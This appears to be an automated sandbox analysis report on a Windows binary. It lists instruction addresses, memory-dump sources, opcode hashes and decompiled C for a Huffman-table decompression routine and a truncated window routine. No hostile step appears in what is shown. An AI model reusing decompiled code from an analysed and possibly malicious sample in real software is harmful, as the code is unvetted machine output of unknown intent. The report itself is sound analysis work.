                        0x004072f7
                        0x004072f9
                        0x004072fc
                        0x00407305
                        0x0040730b
                        0x0040730b
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407302
                        0x0040730d
                        0x00407313
                        0x00407315
                        0x00407318
                        0x0040731a
                        0x00407320
                        0x00407322
                        0x00407324
                        0x00407326
                        0x00407328
                        0x0040732b
                        0x00407334
                        0x00407337
                        0x00407337
                        0x0040732d
                        0x0040732d
                        0x00407330
                        0x00407330
                        0x0040732b
                        0x00407322
                        0x00407339
                        0x0040733b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040733b
                        0x004072ba
                        0x004072ba
                        0x004072c0
                        0x004072c6
                        0x004072c8
                        0x00000000
                        0x00000000
                        0x004072ca
                        0x004072ca
                        0x004072cc
                        0x004072ce
                        0x004072d7
                        0x004072d7
                        0x004072d0
                        0x004072d0
                        0x004072d3
                        0x004072d3
                        0x004072d9
                        0x004072db
                        0x00000000
                        0x00000000
                        0x00407341
                        0x00407341
                        0x00407346
                        0x00407348
                        0x00407349
                        0x0040734a
                        0x0040734b
                        0x00407351
                        0x00407354
                        0x00407357
                        0x0040735a
                        0x0040735c
                        0x00407362
                        0x00407362
                        0x00407365
                        0x00407365
                        0x00407365
                        0x00407365
                        0x0040736e
                        0x00000000
                        0x00000000
                        0x00407373
                        0x00407373
                        0x00407376
                        0x00407379
                        0x0040737b
                        0x00407412
                        0x00407412
                        0x00407415
                        0x00407417
                        0x00407418
                        0x00407419
                        0x0040741c
                        0x00000000
                        0x0040741c
                        0x00407381
                        0x00407381
                        0x00407387
                        0x00407389
                        0x004073ae
                        0x004073b1
                        0x004073b7
                        0x004073bc
                        0x004073c2
                        0x004073c8
                        0x004073ca
                        0x004073cd
                        0x004073d6
                        0x004073dc
                        0x004073dc
                        0x004073cf
                        0x004073d1
                        0x004073d3
                        0x004073d3
                        0x004073de
                        0x004073e4
                        0x004073e6
                        0x004073e9
                        0x004073eb
                        0x004073f1
                        0x004073f3
                        0x004073f5
                        0x004073f7
                        0x004073f9
                        0x004073fc
                        0x00407405
                        0x00407408
                        0x00407408
                        0x004073fe
                        0x004073fe
                        0x00407401
                        0x00407401
                        0x004073fc
                        0x004073f3
                        0x0040740a
                        0x0040740c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040740c
                        0x0040738b
                        0x0040738b
                        0x00407391
                        0x00407397
                        0x00407399
                        0x00000000
                        0x00000000
                        0x0040739b
                        0x0040739b
                        0x0040739d
                        0x0040739f
                        0x004073a6
                        0x004073a6
                        0x004073a8
                        0x004073a1
                        0x004073a1
                        0x004073a3
                        0x004073a3
                        0x004073aa
                        0x004073ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407424
                        0x00407424
                        0x00407427
                        0x00407429
                        0x0040742c
                        0x0040742f
                        0x0040742f
                        0x0040742f
                        0x0040742f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406add
                        0x00406ac1
                        0x00000000
                        0x00406ac7
                        0x00406aca
                        0x00406ad4
                        0x00406ad7
                        0x00406ada
                        0x00000000
                        0x00406ada
                        0x00406ac1
                        0x00406ae5
                        0x00406ae8
                        0x00406aec
                        0x00406af6
                        0x00406b00
                        0x00406b03
                        0x00406b09
                        0x00406c3d
                        0x00406c3f
                        0x00406c45
                        0x00406c48
                        0x00406c4b
                        0x00000000
                        0x00406c4b
                        0x00406b0f
                        0x00406b0f
                        0x00406b10
                        0x00406b68
                        0x00406b68
                        0x00406b6f
                        0x00406c15
                        0x00406c15
                        0x00406c1a
                        0x00406c1d
                        0x00406c22
                        0x00406c25
                        0x00406c2a
                        0x00406c2d
                        0x00406c32
                        0x00406c35
                        0x00406c35
                        0x00000000
                        0x00406b75
                        0x00406b75
                        0x00406b75
                        0x00406b75
                        0x00406b79
                        0x00406b79
                        0x00406b9b
                        0x00406b9e
                        0x00406ba0
                        0x00406ba3
                        0x00406ba8
                        0x00406b7e
                        0x00406b7e
                        0x00406b83
                        0x00406b85
                        0x00406b87
                        0x00406b8c
                        0x00406b92
                        0x00406b97
                        0x00406b99
                        0x00406b99
                        0x00406b8e
                        0x00406b8e
                        0x00406b8e
                        0x00406b8c
                        0x00000000
                        0x00406baa
                        0x00406bd7
                        0x00406bdc
                        0x00406bde
                        0x00406bdf
                        0x00406be1
                        0x00406be2
                        0x00406be2
                        0x00406be2
                        0x00406c0a
                        0x00406c0f
                        0x00406c0f
                        0x00000000
                        0x00406c0f
                        0x00406ba8
                        0x00406b6f
                        0x00406b12
                        0x00406b12
                        0x00406b13
                        0x00406b5d
                        0x00000000
                        0x00406b5d
                        0x00406b15
                        0x00406b16
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c72
                        0x00406c72
                        0x00406c72
                        0x00406c75
                        0x00000000
                        0x00000000
                        0x00406c52
                        0x00406c52
                        0x00406c56
                        0x00000000
                        0x00000000
                        0x00406c5c
                        0x00406c5c
                        0x00406c5f
                        0x00406c62
                        0x00406c67
                        0x00406c69
                        0x00406c6c
                        0x00406c6f
                        0x00406c6f
                        0x00406c6f
                        0x00406c77
                        0x00406c77
                        0x00406c7a
                        0x00406c7c
                        0x00406c81
                        0x00406c84
                        0x00406c86
                        0x00406c89
                        0x00000000
                        0x00000000
                        0x00406c8f
                        0x00406c8f
                        0x00406c91
                        0x00000000
                        0x00000000
                        0x00406c97
                        0x00406c97
                        0x00406c9b
                        0x00000000
                        0x00000000
                        0x00406ca1
                        0x00406ca1
                        0x00406ca4
                        0x00406ca6
                        0x00406d44
                        0x00406d44
                        0x00406d47
                        0x00406d49
                        0x00406d49
                        0x00406d4c
                        0x00406d4f
                        0x00406d51
                        0x00406d53
                        0x00406d55
                        0x00406d55
                        0x00406d5e
                        0x00406d63
                        0x00406d66
                        0x00406d69
                        0x00406d6c
                        0x00406d6f
                        0x00406d6f
                        0x00406d6f
                        0x00406d72
                        0x00406d78
                        0x00406d78
                        0x00406d7e
                        0x00406d7e
                        0x00406d7e
                        0x00000000
                        0x00406d72
                        0x00406cac
                        0x00406cac
                        0x00406cb2
                        0x00406cb5
                        0x00406cb7
                        0x00406ce2
                        0x00406ce5
                        0x00406ceb
                        0x00406cf0
                        0x00406cf6
                        0x00406cfc
                        0x00406cfe
                        0x00406d01
                        0x00406d0a
                        0x00406d10
                        0x00406d10
                        0x00406d03
                        0x00406d05
                        0x00406d07
                        0x00406d07
                        0x00406d12
                        0x00406d18
                        0x00406d1b
                        0x00406d1d
                        0x00406d1f
                        0x00406d25
                        0x00406d27
                        0x00406d29
                        0x00406d2c
                        0x00406d35
                        0x00406d35
                        0x00406d37
                        0x00406d2e
                        0x00406d2e
                        0x00406d31
                        0x00406d31
                        0x00406d39
                        0x00406d39
                        0x00406d27
                        0x00406d3c
                        0x00406d3e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d3e
                        0x00406cb9
                        0x00406cb9
                        0x00406cbf
                        0x00406cc5
                        0x00406cc7
                        0x00000000
                        0x00000000
                        0x00406cc9
                        0x00406cc9
                        0x00406ccb
                        0x00406ccd
                        0x00406cd0
                        0x00406cd7
                        0x00406cd7
                        0x00406cd9
                        0x00406cd2
                        0x00406cd2
                        0x00406cd4
                        0x00406cd4
                        0x00406cdb
                        0x00406cdd
                        0x00406ce0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406de4
                        0x00406de7
                        0x00406dea
                        0x00406df0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406fc7
                        0x00406fc7
                        0x00406fc7
                        0x00406fca
                        0x00406fcd
                        0x00406fcf
                        0x00406fd2
                        0x00406fd8
                        0x00406fdf
                        0x00406fe1
                        0x00000000
                        0x00000000
                        0x00406eb5
                        0x00406eb5
                        0x00406edd
                        0x00406edd
                        0x00406edd
                        0x00406edf
                        0x00000000
                        0x00000000
                        0x00406ebd
                        0x00406ebd
                        0x00406ec1
                        0x00000000
                        0x00000000
                        0x00406ec7
                        0x00406ec7
                        0x00406eca
                        0x00406ecd
                        0x00406ed0
                        0x00406ed2
                        0x00406ed4
                        0x00406ed7
                        0x00406eda
                        0x00406eda
                        0x00406eda
                        0x00406ee1
                        0x00406ee1
                        0x00406ee9
                        0x00406eec
                        0x00406ef2
                        0x00406ef5
                        0x00406ef9
                        0x00406efd
                        0x00406f00
                        0x00406f03
                        0x00406f1b
                        0x00406f1b
                        0x00406f1e
                        0x00406f2c
                        0x00406f2f
                        0x00406f20
                        0x00406f20
                        0x00406f22
                        0x00406f29
                        0x00406f29
                        0x00406f58
                        0x00406f58
                        0x00406f58
                        0x00406f5b
                        0x00406f5d
                        0x00000000
                        0x00000000
                        0x00406f38
                        0x00406f38
                        0x00406f3c
                        0x00000000
                        0x00000000
                        0x00406f42
                        0x00406f42
                        0x00406f45
                        0x00406f48
                        0x00406f4b
                        0x00406f4d
                        0x00406f4f
                        0x00406f52
                        0x00406f55
                        0x00406f55
                        0x00406f55
                        0x00406f5f
                        0x00406f5f
                        0x00406f61
                        0x00406f63
                        0x00406f6e
                        0x00406f71
                        0x00406f74
                        0x00406f76
                        0x00406f78
                        0x00406f7a
                        0x00406f7d
                        0x00406f80
                        0x00406f85
                        0x00406f88
                        0x00406f8b
                        0x00406f8e
                        0x00406f95
                        0x00406f98
                        0x00406f9a
                        0x00000000
                        0x00000000
                        0x00406fa0
                        0x00406fa0
                        0x00406fa4
                        0x00406fb5
                        0x00406fb5
                        0x00406fb5
                        0x00406fb7
                        0x00406fb7
                        0x00406fbb
                        0x00406fbb
                        0x00406fbb
                        0x00406fbd
                        0x00406fbe
                        0x00406fc1
                        0x00406fc1
                        0x00406fc1
                        0x00406fc4
                        0x00000000
                        0x00406fc4
                        0x00406fa6
                        0x00406fa6
                        0x00406fa9
                        0x00000000
                        0x00000000
                        0x00406faf
                        0x00406faf
                        0x00000000
                        0x00406faf
                        0x00406f05
                        0x00406f05
                        0x00406f07
                        0x00406f09
                        0x00406f0c
                        0x00406f0f
                        0x00406f13
                        0x00406f13
                        0x00406fe7
                        0x00406fe7
                        0x00406fea
                        0x00406ff1
                        0x00406ff5
                        0x00406ff7
                        0x00406ffa
                        0x00406ffd
                        0x00407002
                        0x00407005
                        0x00407007
                        0x00407008
                        0x0040700b
                        0x00407016
                        0x00407019
                        0x00407030
                        0x00407035
                        0x0040703c
                        0x00407041
                        0x00407045
                        0x00407047
                        0x00407047
                        0x00407047
                        0x0040704a
                        0x0040704c
                        0x00000000
                        0x00407052
                        0x00407052
                        0x00407056
                        0x00407061
                        0x00407074
                        0x00407079
                        0x0040707e
                        0x00407080
                        0x00000000
                        0x00000000
                        0x00407086
                        0x00407086
                        0x00407089
                        0x0040708b
                        0x00407099
                        0x00407099
                        0x0040709c
                        0x0040709c
                        0x0040709f
                        0x004070a2
                        0x004070a5
                        0x004070a8
                        0x004070ab
                        0x004070ae
                        0x00000000
                        0x004070ae
                        0x0040708d
                        0x0040708d
                        0x00407093
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407093
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407432
                        0x00407432
                        0x00407438
                        0x0040743e
                        0x00407443
                        0x00407449
                        0x0040744f
                        0x00407451
                        0x00407454
                        0x0040745d
                        0x00407463
                        0x00407463
                        0x00407456
                        0x00407458
                        0x0040745a
                        0x0040745a
                        0x00407465
                        0x00407467
                        0x0040746a
                        0x004074a5
                        0x004074a5
                        0x00000000
                        0x0040746c
                        0x0040746c
                        0x0040746c
                        0x00407472
                        0x00407475
                        0x00407477
                        0x004074ac
                        0x004074ae
                        0x00000000
                        0x004074ae
                        0x00000000
                        0x00407477
                        0x00000000
                        0x00406ab6
                        0x00407484
                        0x00000000
                        0x00407484
                        0x00406e98
                        0x00406e9a
                        0x00000000
                        0x00000000
                        0x00406e9c
                        0x00406e9c
                        0x00406e9f
                        0x00000000
                        0x00406e9f
                        0x00406de4
                        0x00406da5
                        0x00407489
                        0x0040748c
                        0x0040748e
                        0x00407497
                        0x0040749d
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                        • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                        • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                        • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                        				signed int _v8;
                        				unsigned int _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				intOrPtr* _v32;
                        				signed int* _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				void _v116;
                        				signed int _v176;
                        				signed int _v180;
                        				signed int _v240;
                        				signed int _t166;
                        				signed int _t168;
                        				intOrPtr _t175;
                        				signed int _t181;
                        				void* _t182;
                        				intOrPtr _t183;
                        				signed int* _t184;
                        				signed int _t186;
                        				signed int _t187;
                        				signed int* _t189;
                        				signed int _t190;
                        				intOrPtr* _t191;
                        				intOrPtr _t192;
                        				signed int _t193;
                        				signed int _t195;
                        				signed int _t200;
                        				signed int _t205;
                        				void* _t207;
                        				short _t208;
                        				signed char _t222;
                        				signed int _t224;
                        				signed int _t225;
                        				signed int* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t235;
                        				signed int _t236;
                        				signed int _t244;
                        				signed int _t246;
                        				signed int _t251;
                        				signed int _t254;
                        				signed int _t256;
                        				signed int _t259;
                        				signed int _t262;
                        				void* _t263;
                        				void* _t264;
                        				signed int _t267;
                        				intOrPtr _t269;
                        				intOrPtr _t271;
                        				signed int _t274;
                        				intOrPtr* _t275;
                        				unsigned int _t276;
                        				void* _t277;
                        				signed int _t278;
                        				intOrPtr* _t279;
                        				signed int _t281;
                        				intOrPtr _t282;
                        				intOrPtr _t283;
                        				signed int* _t284;
                        				signed int _t286;
                        				signed int _t287;
                        				signed int _t288;
                        				signed int _t296;
                        				signed int* _t297;
                        				intOrPtr _t298;
                        				void* _t299;
                        
                        				_t278 = _a8;
                        				_t187 = 0x10;
                        				memset( &_v116, 0, _t187 << 2);
                        				_t189 = _a4;
                        				_t233 = _t278;
                        				do {
                        					_t166 =  *_t189;
                        					_t189 =  &(_t189[1]);
                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                        					_t233 = _t233 - 1;
                        				} while (_t233 != 0);
                        				if(_v116 != _t278) {
                        					_t279 = _a28;
                        					_t267 =  *_t279;
                        					_t190 = 1;
                        					_a28 = _t267;
                        					_t234 = 0xf;
                        					while(1) {
                        						_t168 = 0;
                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                        							break;
                        						}
                        						_t190 = _t190 + 1;
                        						if(_t190 <= _t234) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_v8 = _t190;
                        					if(_t267 < _t190) {
                        						_a28 = _t190;
                        					}
                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                        						_t234 = _t234 - 1;
                        						if(_t234 != 0) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_v28 = _t234;
                        					if(_a28 > _t234) {
                        						_a28 = _t234;
                        					}
                        					 *_t279 = _a28;
                        					_t181 = 1 << _t190;
                        					while(_t190 < _t234) {
                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                        						if(_t182 < 0) {
                        							L64:
                        							return _t168 | 0xffffffff;
                        						}
                        						_t190 = _t190 + 1;
                        						_t181 = _t182 + _t182;
                        					}
                        					_t281 = _t234 << 2;
                        					_t191 = _t299 + _t281 - 0x70;
                        					_t269 =  *_t191;
                        					_t183 = _t181 - _t269;
                        					_v52 = _t183;
                        					if(_t183 < 0) {
                        						goto L64;
                        					}
                        					_v176 = _t168;
                        					 *_t191 = _t269 + _t183;
                        					_t192 = 0;
                        					_t235 = _t234 - 1;
                        					if(_t235 == 0) {
                        						L21:
                        						_t184 = _a4;
                        						_t271 = 0;
                        						do {
                        							_t193 =  *_t184;
                        							_t184 =  &(_t184[1]);
                        							if(_t193 != _t168) {
                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                        								_t236 =  *_t232;
                        								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                        								 *_t232 = _t236 + 1;
                        							}
                        							_t271 = _t271 + 1;
                        						} while (_t271 < _a8);
                        						_v16 = _v16 | 0xffffffff;
                        						_v40 = _v40 & 0x00000000;
                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                        						_t195 = _v8;
                        						_t186 =  ~_a28;
                        						_v12 = _t168;
                        						_v180 = _t168;
                        						_v36 = 0x432190;
                        						_v240 = _t168;
                        						if(_t195 > _v28) {
                        							L62:
                        							_t168 = 0;
                        							if(_v52 == 0 || _v28 == 1) {
                        								return _t168;
                        							} else {
                        								goto L64;
                        							}
                        						}
                        						_v44 = _t195 - 1;
                        						_v32 = _t299 + _t195 * 4 - 0x70;
                        						do {
                        							_t282 =  *_v32;
                        							if(_t282 == 0) {
                        								goto L61;
                        							}
                        							while(1) {
                        								_t283 = _t282 - 1;
                        								_t200 = _a28 + _t186;
                        								_v48 = _t283;
                        								_v24 = _t200;
                        								if(_v8 <= _t200) {
                        									goto L45;
                        								}
                        								L31:
                        								_v20 = _t283 + 1;
                        								do {
                        									_v16 = _v16 + 1;
                        									_t296 = _v28 - _v24;
                        									if(_t296 > _a28) {
                        										_t296 = _a28;
                        									}
                        									_t222 = _v8 - _v24;
                        									_t254 = 1 << _t222;
                        									if(1 <= _v20) {
                        										L40:
                        										_t256 =  *_a36;
                        										_t168 = 1 << _t222;
                        										_v40 = 1;
                        										_t274 = _t256 + 1;
                        										if(_t274 > 0x5a0) {
                        											goto L64;
                        										}
                        									} else {
                        										_t275 = _v32;
                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                        										if(_t222 >= _t296) {
                        											goto L40;
                        										}
                        										while(1) {
                        											_t222 = _t222 + 1;
                        											if(_t222 >= _t296) {
                        												goto L40;
                        											}
                        											_t275 = _t275 + 4;
                        											_t264 = _t263 + _t263;
                        											_t175 =  *_t275;
                        											if(_t264 <= _t175) {
                        												goto L40;
                        											}
                        											_t263 = _t264 - _t175;
                        										}
                        										goto L40;
                        									}
                        									_t168 = _a32 + _t256 * 4;
                        									_t297 = _t299 + _v16 * 4 - 0xec;
                        									 *_a36 = _t274;
                        									_t259 = _v16;
                        									 *_t297 = _t168;
                        									if(_t259 == 0) {
                        										 *_a24 = _t168;
                        									} else {
                        										_t276 = _v12;
                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                        										_a5 = _a28;
                        										_a4 = _t222;
                        										_t262 = _t276 >> _t186;
                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                        										 *(_t298 + _t262 * 4) = _a4;
                        									}
                        									_t224 = _v24;
                        									_t186 = _t224;
                        									_t225 = _t224 + _a28;
                        									_v24 = _t225;
                        								} while (_v8 > _t225);
                        								L45:
                        								_t284 = _v36;
                        								_a5 = _v8 - _t186;
                        								if(_t284 < 0x432190 + _a8 * 4) {
                        									_t205 =  *_t284;
                        									if(_t205 >= _a12) {
                        										_t207 = _t205 - _a12 + _t205 - _a12;
                        										_v36 =  &(_v36[1]);
                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                        									} else {
                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                        										_t208 =  *_t284;
                        										_v36 =  &(_t284[1]);
                        									}
                        									_a6 = _t208;
                        								} else {
                        									_a4 = 0xc0;
                        								}
                        								_t286 = 1 << _v8 - _t186;
                        								_t244 = _v12 >> _t186;
                        								while(_t244 < _v40) {
                        									 *(_t168 + _t244 * 4) = _a4;
                        									_t244 = _t244 + _t286;
                        								}
                        								_t287 = _v12;
                        								_t246 = 1 << _v44;
                        								while((_t287 & _t246) != 0) {
                        									_t287 = _t287 ^ _t246;
                        									_t246 = _t246 >> 1;
                        								}
                        								_t288 = _t287 ^ _t246;
                        								_v20 = 1;
                        								_v12 = _t288;
                        								_t251 = _v16;
                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                        									L60:
                        									if(_v48 != 0) {
                        										_t282 = _v48;
                        										_t283 = _t282 - 1;
                        										_t200 = _a28 + _t186;
                        										_v48 = _t283;
                        										_v24 = _t200;
                        										if(_v8 <= _t200) {
                        											goto L45;
                        										}
                        										goto L31;
                        									}
                        									break;
                        								} else {
                        									goto L58;
                        								}
                        								do {
                        									L58:
                        									_t186 = _t186 - _a28;
                        									_t251 = _t251 - 1;
                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                        								_v16 = _t251;
                        								goto L60;
                        							}
                        							L61:
                        							_v8 = _v8 + 1;
                        							_v32 = _v32 + 4;
                        							_v44 = _v44 + 1;
                        						} while (_v8 <= _v28);
                        						goto L62;
                        					}
                        					_t277 = 0;
                        					do {
                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                        						_t277 = _t277 + 4;
                        						_t235 = _t235 - 1;
                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                        					} while (_t235 != 0);
                        					goto L21;
                        				}
                        				 *_a24 =  *_a24 & 0x00000000;
                        				 *_a28 =  *_a28 & 0x00000000;
                        				return 0;
                        			}











































































                        0x00407567
                        0x0040756f
                        0x00407573
                        0x00407575
                        0x00407578
                        0x0040757a
                        0x0040757a
                        0x0040757c
                        0x00407583
                        0x00407585
                        0x00407585
                        0x0040758b
                        0x004075a0
                        0x004075a8
                        0x004075aa
                        0x004075ac
                        0x004075af
                        0x004075b0
                        0x004075b0
                        0x004075b6
                        0x00000000
                        0x00000000
                        0x004075b8
                        0x004075bb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004075bb
                        0x004075bf
                        0x004075c2
                        0x004075c4
                        0x004075c4
                        0x004075c7
                        0x004075cd
                        0x004075ce
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004075ce
                        0x004075d3
                        0x004075d6
                        0x004075d8
                        0x004075d8
                        0x004075de
                        0x004075e0
                        0x004075f1
                        0x004075e4
                        0x004075e8
                        0x0040788d
                        0x00000000
                        0x0040788d
                        0x004075ee
                        0x004075ef
                        0x004075ef
                        0x004075f7
                        0x004075fa
                        0x004075fe
                        0x00407600
                        0x00407602
                        0x00407605
                        0x00000000
                        0x00000000
                        0x0040760d
                        0x00407613
                        0x00407615
                        0x00407617
                        0x00407618
                        0x0040762d
                        0x0040762d
                        0x00407630
                        0x00407632
                        0x00407632
                        0x00407634
                        0x00407639
                        0x0040763b
                        0x00407642
                        0x00407644
                        0x0040764c
                        0x0040764c
                        0x0040764e
                        0x0040764f
                        0x0040765e
                        0x00407662
                        0x00407666
                        0x00407669
                        0x0040766c
                        0x00407671
                        0x00407674
                        0x0040767a
                        0x00407681
                        0x00407687
                        0x00407880
                        0x00407880
                        0x00407885
                        0x00407894
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407885
                        0x00407694
                        0x00407697
                        0x0040769a
                        0x0040769d
                        0x004076a1
                        0x00000000
                        0x00000000
                        0x004076ac
                        0x004076af
                        0x004076b0
                        0x004076b2
                        0x004076b8
                        0x004076bb
                        0x00000000
                        0x00000000
                        0x004076c1
                        0x004076c2
                        0x004076c5
                        0x004076c8
                        0x004076cb
                        0x004076d1
                        0x004076d3
                        0x004076d3
                        0x004076db
                        0x004076df
                        0x004076e4
                        0x00407709
                        0x0040770f
                        0x00407711
                        0x00407713
                        0x00407716
                        0x0040771f
                        0x00000000
                        0x00000000
                        0x004076e6
                        0x004076e6
                        0x004076ef
                        0x004076f3
                        0x00000000
                        0x00000000
                        0x00407704
                        0x00407704
                        0x00407707
                        0x00000000
                        0x00000000
                        0x004076f7
                        0x004076fa
                        0x004076fc
                        0x00407700
                        0x00000000
                        0x00000000
                        0x00407702
                        0x00407702
                        0x00000000
                        0x00407704
                        0x00407728
                        0x0040772e
                        0x00407738
                        0x0040773a
                        0x0040773f
                        0x00407741
                        0x00407777
                        0x00407743
                        0x00407743
                        0x00407746
                        0x00407749
                        0x00407753
                        0x00407756
                        0x0040775d
                        0x00407768
                        0x0040776f
                        0x0040776f
                        0x00407779
                        0x0040777c
                        0x0040777e
                        0x00407784
                        0x00407784
                        0x0040778d
                        0x00407790
                        0x00407795
                        0x004077a4
                        0x004077ac
                        0x004077b1
                        0x004077d5
                        0x004077dd
                        0x004077e1
                        0x004077e7
                        0x004077b3
                        0x004077c1
                        0x004077c4
                        0x004077ca
                        0x004077ca
                        0x004077eb
                        0x004077a6
                        0x004077a6
                        0x004077a6
                        0x004077fc
                        0x00407800
                        0x0040780c
                        0x00407807
                        0x0040780a
                        0x0040780a
                        0x00407814
                        0x00407819
                        0x00407821
                        0x0040781d
                        0x0040781f
                        0x0040781f
                        0x00407827
                        0x00407829
                        0x00407830
                        0x0040783a
                        0x00407844
                        0x00407860
                        0x00407864
                        0x004076a9
                        0x004076af
                        0x004076b0
                        0x004076b2
                        0x004076b8
                        0x004076bb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004076bb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407846
                        0x00407846
                        0x00407846
                        0x0040784b
                        0x00407854
                        0x0040785d
                        0x00000000
                        0x0040785d
                        0x0040786a
                        0x0040786a
                        0x0040786d
                        0x00407874
                        0x00407877
                        0x00000000
                        0x0040769a
                        0x0040761a
                        0x0040761c
                        0x0040761c
                        0x00407620
                        0x00407623
                        0x00407624
                        0x00407624
                        0x00000000
                        0x0040761c
                        0x00407590
                        0x00407596
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                        • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                        • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                        • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                        				struct HWND__* _v8;
                        				struct HWND__* _v12;
                        				long _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				signed char* _v32;
                        				int _v36;
                        				signed int _v44;
                        				int _v48;
                        				signed int* _v60;
                        				signed char* _v64;
                        				signed int _v68;
                        				long _v72;
                        				void* _v76;
                        				intOrPtr _v80;
